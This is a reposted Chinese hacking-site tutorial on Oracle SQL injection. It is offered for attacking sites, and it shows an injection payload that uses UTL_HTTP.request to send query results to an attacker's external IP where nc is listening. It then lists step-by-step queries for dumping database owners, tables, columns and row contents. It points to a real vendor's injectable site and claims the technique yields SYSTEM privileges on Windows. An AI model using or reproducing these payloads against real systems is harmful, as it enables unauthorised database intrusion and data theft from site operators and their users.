您没有来错地!为了更好的发展黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

Oracle注射技术——Oracle+nc注射

2009-5-2 11:22| 投稿: computer

摘要: 作者:KindleMSN :Kindle@live.cnBlog:http://hi.baidu.com/system_expTeam:反安全技术小组 (http://bbs.exploits.com...
作者:KindleMSN :Kindle@live.cnBlog:http://hi.baidu.com/system_expTeam:反安全技术小组 (http://bbs.exploits.com.cn) 首先外网nc监听对应的端口 url语句简单如下所示: http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- 内容如下: and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--爆库: select owner from all_tables where rownum=1 select owner from all_tables where owner<>'第一个库名' and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1 以此论推 爆表: select TABLE_NAME from all_tables where owner='库名'and rownum=1 select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2' 以此论推 爆列: select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名' 爆内容: 第一个内容:select 列名 from 表名 where rownum=1 第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' 第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值' 以此论推 现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光”http://bbs.exploits.com.cn/read.php?tid-144.html 是不是很明了了...o(∩_∩)o...哈哈 注:1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁3.这是个系列文章,后文有待更新  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部